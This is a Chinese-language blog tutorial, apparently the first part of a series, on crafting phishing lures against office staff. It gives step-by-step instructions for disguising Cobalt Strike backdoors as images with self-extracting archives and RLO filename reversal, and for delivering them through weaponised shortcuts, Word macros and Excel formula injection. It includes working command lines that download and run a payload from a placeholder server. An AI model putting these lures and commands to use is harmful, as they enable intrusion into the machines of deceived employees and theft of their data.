网络钓鱼“骚”姿势(一)

一、什么是网络钓鱼

网络钓鱼是通过伪造银行或其他知名机构向他人发送垃圾邮件，意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息)的一种攻击方式。

二、网络钓鱼的基本流程

钓鱼一般分为三个步骤：寻找大鱼，制作鱼饵和抛竿

寻找大鱼：我们的目标一般包括： HR、销售、文员等安全意识比较薄弱的人员，以及运维、开发等掌握重要资源的人员。

制作鱼饵：一个高质量鱼饵一般分为两部分，一个是邮件内容更加的逼真可信，另一个是邮件的附件尽可能伪装的正常

抛竿：最后把鱼竿抛出后就可以坐等鱼上钩了

三、如何制作高质量鱼饵

0x01.自解压+RLO

制作思路：利用自解压文件的特性，解压后令其自动执行解压出来的文件，达到上线的目的，由于自解压文件后缀为exe，很容易被识破，所以我们还需使用RLO后缀反转进行一些伪装。

步骤一：用cs生成windows后门

步骤二：随便准备一张图片，使用WinRAR把后门和图片一块自解压

压缩文件时需在高级——自解压选项中进行一些的设置使木马的执行更加隐蔽：

常规——解压路径：C:\windows\temp

设置——解压后运行：C:\windows\temp\artifact.exe

C:\windows\temp\壁纸.jpg

模式——全部隐藏

更新——更新模式——解压并更新文件

更新——覆盖模式——覆盖所有文件

步骤三：使用resourcehacker更换文件图标,将其伪装成图片

步骤四：把文件重命名为壁纸gpj.exe，再使用RLO对后缀进行反转，最后效果如下

结合邮件钓鱼等方式把“图片”放送给他人，引诱他人上钩

对方双击“图片”后，会同时执行artifact.exe和壁纸.jpg，而且上线cs

0x02.快捷方式

制作思路：运行快捷键方式时，执行命令让其下载我们提前放在服务器上的后门程序并且运行

步骤一：cs生成后门，放到服务器网站目录下

步骤二：创建快捷方式，在目标中写入以下代码

C:\Windows\System32\cmd.exe /k curl http://xxx.xxx.xxx.xxx/exe/artifact.exe --output C:\Windows\temp\win.exe && C:\Windows\temp\win.exe

步骤三：更换图标，增加其真实性

当对方双击快捷键方式时就会下载我们准备好的artifact.exe并且执行

0x03.Word宏病毒

宏病毒是Word中被嵌入的带有恶意行为的宏代码（VBA代码），当我们双击打开带有宏病毒的word文档的时候它的宏代码会自动运行。

步骤一：使用cs生成恶意vba代码

步骤二：新建doc文档，创建宏，保存即可

步骤三：再次打开文件后提示是否启用宏，点击启用就会上线cs

0x04.Excel注入

Excel注入是一种将包含恶意命令的excel公式插入到可以导出csv或xls等格式的文本中，当在excel中打开xls文件时，文件会转换为excel格式并提供excel公式的执行功能，从而造成命令执行。

利用excel注入弹出计算器

注入代码：=cmd| '/c calc'! '!A1'

利用excel注入上线cs

步骤一：使用cs生成exe后门，并放到服务器上

步骤二：更换恶意代码

=cmd| '/c curl http://xxx.xxx.xxx.xxx/beacon.exe --output C:\Windows\temp\win.exe && C:\Windows\temp\win.exe' ! 'A1'

当双击打开该excel时就会执行恶意代码下载cs后门并运行 ，上线cs